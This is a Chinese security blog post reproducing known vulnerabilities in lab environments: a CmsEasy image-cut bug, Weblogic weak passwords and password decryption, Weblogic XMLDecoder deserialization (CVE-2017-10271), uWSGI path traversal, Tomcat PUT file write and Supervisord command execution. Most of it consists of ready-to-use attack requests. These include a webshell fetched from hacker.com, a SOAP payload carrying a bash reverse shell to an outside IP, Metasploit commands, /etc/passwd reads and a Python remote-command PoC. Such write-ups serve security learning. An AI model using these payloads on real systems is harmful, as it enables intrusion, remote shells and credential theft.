<p>目标站 <a href="http://www.target2.com/" target="_blank" rel="noopener">http://www.target2.com/</a> 放在web根目录 就需要补上1位，POST数据就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pic=1ftp://hacker.com/shell.php&amp;w=228&amp;h=146&amp;x1=0&amp;x2=228&amp;y1=0&amp;y2=146</span><br></pre></td></tr></table></figure>
<h2 id="Weblogic弱密码综合环境"><a href="#Weblogic弱密码综合环境" class="headerlink" title="Weblogic弱密码综合环境"></a>Weblogic弱密码综合环境</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">本环境模拟了一个真实的weblogic环境，其后台存在一个弱口令，并且前台存在任意文件读取漏洞。分别通过这两种漏洞，模拟对weblogic场景的渗透。</span><br><span class="line"></span><br><span class="line">Weblogic版本：10.3.6(11g)</span><br><span class="line"></span><br><span class="line">Java版本：1.6</span><br></pre></td></tr></table></figure>
<ul>
<li>弱口令</li>
</ul>
<p>环境启动后，访问<a href="http://your-ip:7001/console，即为weblogic后台。" target="_blank" rel="noopener">http://your-ip:7001/console，即为weblogic后台。</a></p>
<p>本环境存在弱口令：</p>
<p>weblogic<br>Oracle@123</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g2017hbcj9j31gu0inn17.jpg" alt=""></p>
<p>weblogic常用弱口令： <a href="http://cirt.net/passwords?criteria=weblogic" target="_blank" rel="noopener">http://cirt.net/passwords?criteria=weblogic</a></p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g2018ryi1bj31eo0mqwi0.jpg" alt=""></p>
<ul>
<li>任意文件读取漏洞的利用</li>
</ul>
<p>假设不存在弱口令，如何对weblogic进行渗透？</p>
<p>本环境前台模拟了一个任意文件下载漏洞，访问<a href="http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件。" target="_blank" rel="noopener">http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件。</a></p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g201b1ao8tj317a0ivtf4.jpg" alt=""></p>
<ul>
<li>读取后台用户密文与密钥文件</li>
</ul>
<p>weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml，在本环境中为./security/SerializedSystemIni.dat和./config/config.xml（基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain）。</p>
<p>SerializedSystemIni.dat是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，右键copy to file就可以保存成一个文件：</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g201f3xz6ij313k0ecwgd.jpg" alt=""></p>
<p>config.xml是base_domain的全局配置文件，所以乱七八糟的内容比较多，找到其中的<node-manager-password-encrypted>的值，即为加密后的管理员密码，不要找错了：</node-manager-password-encrypted></p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g201i0s21mj31460ffn0n.jpg" alt=""></p>
<p>使用weblogic_decrypt.jar解密</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g202ywwvxyj30ox0c8myv.jpg" alt=""></p>
<ul>
<li>后台上传webshell</li>
</ul>
<p>获取到管理员密码后，登录后台。点击左侧的部署，可见一个应用列表：</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g2032fj0ohj31fp0fvtat.jpg" alt=""></p>
<p>点击安装，选择“上载文件”：</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g20347umuwj30zc0e5jsa.jpg" alt=""></p>
<p>上传war包。值得注意的是，我们平时tomcat用的war包不一定能够成功，你可以将你的webshell放到本项目的web/hello.war这个压缩包中，再上传。上传成功后点下一步。</p>
<p>填写应用名称：</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g203deo2rvj30rb0himy6.jpg" alt=""></p>
<p>获取到shell</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g203mrumxhj311v0i5t9r.jpg" alt=""></p>
<h2 id="Weblogic-lt-10-3-6’wls-wsat’XMLDecoder反序列化漏洞"><a href="#Weblogic-lt-10-3-6’wls-wsat’XMLDecoder反序列化漏洞" class="headerlink" title="Weblogic&lt;10.3.6’wls-wsat’XMLDecoder反序列化漏洞"></a>Weblogic&lt;10.3.6’wls-wsat’XMLDecoder反序列化漏洞</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Weblogic&lt;10.3.6&apos;wls-wsat&apos;XMLDecoder反序列化漏洞（CVE-2017-10271）</span><br></pre></td></tr></table></figure>
<p>使用burp进行抓包改包</p>
<p>修改请求方式为post，Upgrade-Insecure-Requests: 1，Content-Type: text/xml</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">POST /wls-wsat/CoordinatorPortType HTTP/1.1</span><br><span class="line">Host: 218.2.197.241:28751</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3</span><br><span class="line">DNT: 1</span><br><span class="line">Cookie: UM_distinctid=16a10b48a055cd-02118f22bc71408-1369634a-1fa400-16a10b48a06588; CNZZDATA80862620=cnzz_eid%3D1748192288-1555056624-%26ntime%3D1555056624</span><br><span class="line">X-Forwarded-For: 8.8.8.8</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: text/xml</span><br><span class="line">Content-Length: 673</span><br><span class="line"></span><br><span class="line">&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;</span><br><span class="line">      &lt;soapenv:Header&gt;</span><br><span class="line">        &lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;</span><br><span class="line">         &lt;java version=&quot;1.6.0&quot; class=&quot;java.beans.XMLDecoder&quot;&gt;</span><br><span class="line">                    &lt;object class=&quot;java.io.PrintWriter&quot;&gt; </span><br><span class="line">                        &lt;string&gt;servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt&lt;/string&gt;&lt;void method=&quot;println&quot;&gt;</span><br><span class="line">                        &lt;string&gt;xmldecoder_vul_test&lt;/string&gt;&lt;/void&gt;&lt;void method=&quot;close&quot;/&gt;</span><br><span class="line">                    &lt;/object&gt;</span><br><span class="line">            &lt;/java&gt;</span><br><span class="line">        &lt;/work:WorkContext&gt;</span><br><span class="line">      &lt;/soapenv:Header&gt;</span><br><span class="line">      &lt;soapenv:Body/&gt;</span><br><span class="line">&lt;/soapenv:Envelope&gt;</span><br></pre></td></tr></table></figure>
<p>若成功，则也可以访问该文件</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g20y7xjum9j30zd0f3jsd.jpg" alt=""></p>
<p>获取shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;</span><br><span class="line">      &lt;soapenv:Header&gt;</span><br><span class="line">        &lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;</span><br><span class="line">         &lt;java version=&quot;1.6.0&quot; class=&quot;java.beans.XMLDecoder&quot;&gt;</span><br><span class="line">                    &lt;object class=&quot;java.io.PrintWriter&quot;&gt; </span><br><span class="line">                        &lt;string&gt;bash -i &amp;gt;&amp;amp; /dev/tcp/47.95.220.200/66 0&amp;gt;&amp;amp;1&lt;/string&gt;&lt;void method=&quot;println&quot;&gt;</span><br><span class="line">                        &lt;string&gt;xmldecoder_vul_test&lt;/string&gt;&lt;/void&gt;&lt;void method=&quot;close&quot;/&gt;</span><br><span class="line">                    &lt;/object&gt;</span><br><span class="line">            &lt;/java&gt;</span><br><span class="line">        &lt;/work:WorkContext&gt;</span><br><span class="line">      &lt;/soapenv:Header&gt;</span><br><span class="line">      &lt;soapenv:Body/&gt;</span><br><span class="line">&lt;/soapenv:Envelope&gt;</span><br></pre></td></tr></table></figure>
<p>注意其中反弹shell的语句，需要进行编码，否则解析XML的时候将出现格式错误</p>
<p>msf下也有相关模块，可以直接使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; search cve-2017-10271</span><br><span class="line">msf5 &gt; use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce </span><br><span class="line">msf5 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) &gt; set RHOSTS 218.2.197.241</span><br><span class="line">msf5 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) &gt; set RPORT 28751</span><br><span class="line">msf5 exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) &gt; exploit</span><br></pre></td></tr></table></figure>
<h2 id="uWSGIPHP目录穿越漏洞（CVE-2018-7490）"><a href="#uWSGIPHP目录穿越漏洞（CVE-2018-7490）" class="headerlink" title="uWSGIPHP目录穿越漏洞（CVE-2018-7490）"></a>uWSGIPHP目录穿越漏洞（CVE-2018-7490）</h2><p>构造如下payload：</p>
<blockquote>
<p>/..%2f..%2f..%2f..%2f..%2fetc/passwd</p>
</blockquote>
<p>成功读取文件</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g20z8uelhjj31gd0db765.jpg" alt=""></p>
<h2 id="TomcatPUT方法任意写文件漏洞（CVE-2017-12615）"><a href="#TomcatPUT方法任意写文件漏洞（CVE-2017-12615）" class="headerlink" title="TomcatPUT方法任意写文件漏洞（CVE-2017-12615）"></a>TomcatPUT方法任意写文件漏洞（CVE-2017-12615）</h2><p>构造如下数据包</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">PUT /1.jsp/ HTTP/1.1</span><br><span class="line">Host: ip:8080</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 5</span><br><span class="line"></span><br><span class="line">shell</span><br></pre></td></tr></table></figure>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g20zcj4d23j313w0ctmyc.jpg" alt=""></p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g20zih9ie0j30sh0azgmf.jpg" alt=""></p>
<h2 id="Supervisord远程命令执行漏洞"><a href="#Supervisord远程命令执行漏洞" class="headerlink" title="Supervisord远程命令执行漏洞"></a>Supervisord远程命令执行漏洞</h2><p>直接执行任意命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">POST /RPC2 HTTP/1.1</span><br><span class="line">Host: localhost</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 213</span><br><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;methodCall&gt;</span><br><span class="line">&lt;methodName&gt;supervisor.supervisord.options.warnings.linecache.os.system&lt;/methodName&gt;</span><br><span class="line">&lt;params&gt;</span><br><span class="line">&lt;param&gt;</span><br><span class="line">&lt;string&gt;touch /tmp/success&lt;/string&gt;</span><br><span class="line">&lt;/param&gt;</span><br><span class="line">&lt;/params&gt;</span><br><span class="line">&lt;/methodCall&gt;</span><br></pre></td></tr></table></figure>
<p>@Ricter 在微博上提出的一个思路，甚是有效，就是将命令执行的结果写入log文件中，再调用Supervisord自带的readLog方法读取log文件，将结果读出来。</p>
<p>写了个简单的POC： poc.py，直接贴出来吧：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> xmlrpc.client</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">target = sys.argv[<span class="number">1</span>]</span><br><span class="line">command = sys.argv[<span class="number">2</span>]</span><br><span class="line"><span class="keyword">with</span> xmlrpc.client.ServerProxy(target) <span class="keyword">as</span> proxy:</span><br><span class="line">    old = getattr(proxy, <span class="string">'supervisor.readLog'</span>)(<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    logfile = getattr(proxy, <span class="string">'supervisor.supervisord.options.logfile.strip'</span>)()</span><br><span class="line">    getattr(proxy, <span class="string">'supervisor.supervisord.options.warnings.linecache.os.system'</span>)(<span class="string">'&#123;&#125; | tee -a &#123;&#125;'</span>.format(command, logfile))</span><br><span class="line">    result = getattr(proxy, <span class="string">'supervisor.readLog'</span>)(<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    print(result[len(old):])</span><br></pre></td></tr></table></figure>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g20zmzetdjj30mt04yjrb.jpg" alt=""></p>
<h2 id="未完待续…"><a href="#未完待续…" class="headerlink" title="未完待续…."></a>未完待续….</h2>
      
    </div>

    

    
    
    

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/vuls复现/">vuls复现(一)</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 冷逸 的个人博客">冷逸</a></p>
  <p><span>发布时间:</span>2019年04月12日 - 15:04</p>
  <p><span>最后更新:</span>2019年04月13日 - 14:04</p>
  <p><span>原始链接:</span><a href="/vuls复现/" title="vuls复现(一)">https://lengjibo.github.io/vuls复现/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://lengjibo.github.io/vuls复现/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
    });
    });  
</script>


      
    </div>
    <div>
      
        <div>
    
        <div style="text-align:center;color: #555;font-size:14px;">-------------The End-------------</div>
    
</div>

      
    </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat.png" alt="冷逸 WeChat Pay"/>
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/zhifubao.jpg" alt="冷逸 Alipay"/>
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞/" rel="tag"><i class="fa fa-tag"></i> 漏洞</a>
          
            <a href="/tags/CVE/" rel="tag"><i class="fa fa-tag"></i> CVE</a>
          
            <a href="/tags/redis/" rel="tag"><i class="fa fa-tag"></i> redis</a>
          
            <a href="/tags/Drupal/" rel="tag"><i class="fa fa-tag"></i> Drupal</a>
          
            <a href="/tags/weblogic/" rel="tag"><i class="fa fa-tag"></i> weblogic</a>
          
            <a href="/tags/Supervisord/" rel="tag"><i class="fa fa-tag"></i> Supervisord</a>
          
            <a href="/tags/uWSGIPHP/" rel="tag"><i class="fa fa-tag"></i> uWSGIPHP</a>
          
        </div>
      

      
      
        <div class="post-widgets">
        

        

        
          
          <div class="social_share">
            
               <div>
                 
  <div class="bdsharebuttonbox">
    <a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
    <a href="#" class="bds_douban" data-cmd="douban" title="分享到豆瓣网"></a>
    <a href="#" class="bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
    <a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a>
    <a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信"></a>
    <a href="#" class="bds_tieba" data-cmd="tieba" title="分享到百度贴吧"></a>
    <a href="#" class="bds_twi" data-cmd="twi" title="分享到Twitter"></a>
    <a href="#" class="bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
    <a href="#" class="bds_more" data-cmd="more"></a>
    <a class="bds_count" data-cmd="count"></a>
  </div>
  <script>
    window._bd_share_config = {
      "common": {
        "bdText": "",
        "bdMini": "2",
        "bdMiniList": false,
        "bdPic": ""
      },
      "share": {
        "bdSize": "16",
        "bdStyle": "0"
      },
      "image": {
        "viewList": ["tsina", "douban", "sqq", "qzone", "weixin", "twi", "fbook"],
        "viewText": "分享到：",
        "viewSize": "16"
      }
    }
  </script>

<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

               </div>
            
            
          </div>
        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019西湖论剑部分writeup/" rel="next" title="2019西湖论剑部分writeup">
                <i class="fa fa-chevron-left"></i> 2019西湖论剑部分writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/赛宁平台web题解/" rel="prev" title="赛宁平台web题解(一)">
                赛宁平台web题解(一) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="http://ww1.sinaimg.cn/large/007F8GgBly1g7vony4ltaj308w08wq30.jpg"
                alt="冷逸" />
            
              <p class="site-author-name" itemprop="name">冷逸</p>
              <p class="site-description motion-element" itemprop="description">做一个温柔的人...</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">113</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">Kategorien</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">120</span>
                    <span class="site-state-item-name">Tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/../../.deploy_git/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/lengjibo" target="_blank" title="GitHub"><i class="fa fa-fw fa-globe"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="qqlengyi@163.com" target="_blank" title="E-Mail"><i class="fa fa-fw fa-globe"></i>E-Mail</a>
                  
                </span>
              
            </div>
          
        <div id="music163player">
            <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=110 src="https://music.163.com/outchain/player?type=0&id=377079922&auto=1&height=90"></iframe>
          </div>
          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sqlmap.wiki/" title="青春's blog" target="_blank">青春's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.addon.pub/" title="Yokeen's blog" target="_blank">Yokeen's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://freeerror.org/" title="之乎者也's blog" target="_blank">之乎者也's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.bugbank.cn/team/FrigidSword" title="漏洞银行" target="_blank">漏洞银行</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.vulbox.com/team/Frigid%20Sword%E5%AE%89%E5%85%A8%E5%9B%A2%E9%98%9F" title="漏洞盒子" target="_blank">漏洞盒子</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://godpang.github.io/" title="Mr.赵" target="_blank">Mr.赵</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://amliaw4.github.io/" title="amliaW4'S Blog" target="_blank">amliaW4'S Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.se7ensec.cn/" title="se7en's Blog" target="_blank">se7en's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ninjia.gitbook.io/secskill/" title="secskill" target="_blank">secskill</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.bug1024.cn/" title="ibug" target="_blank">ibug</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://wwcx.org/" title="Strjziny's Blog" target="_blank">Strjziny's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Redis-未授权访问漏洞"><span class="nav-number">1.</span> <span class="nav-text">Redis 未授权访问漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Memcached-Server-APPEND-PREPEND-远程代码执行漏洞-CVE-2016-8704"><span class="nav-number">2.</span> <span class="nav-text">Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Drupal-PECL-YAML-parser-远程代码执行漏洞"><span class="nav-number">3.</span> <span class="nav-text">Drupal PECL YAML parser 远程代码执行漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CmsEasy-lt-5-6-20161012-cut-image-代码执行漏洞"><span class="nav-number">4.</span> <span class="nav-text">CmsEasy &lt; 5.6 20161012 cut_image 代码执行漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Weblogic弱密码综合环境"><span class="nav-number">5.</span> <span class="nav-text">Weblogic弱密码综合环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Weblogic-lt-10-3-6’wls-wsat’XMLDecoder反序列化漏洞"><span class="nav-number">6.</span> <span class="nav-text">Weblogic&lt;10.3.6’wls-wsat’XMLDecoder反序列化漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#uWSGIPHP目录穿越漏洞（CVE-2018-7490）"><span class="nav-number">7.</span> <span class="nav-text">uWSGIPHP目录穿越漏洞（CVE-2018-7490）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TomcatPUT方法任意写文件漏洞（CVE-2017-12615）"><span class="nav-number">8.</span> <span class="nav-text">TomcatPUT方法任意写文件漏洞（CVE-2017-12615）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Supervisord远程命令执行漏洞"><span class="nav-number">9.</span> <span class="nav-text">Supervisord远程命令执行漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#未完待续…"><span class="nav-number">10.</span> <span class="nav-text">未完待续….</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2014 – <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">冷逸</span>

  

  
</div>




  <div class="powered-by">Erstellt mit  <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> v3.7.1</div>



  <span class="post-meta-divider">|</span>



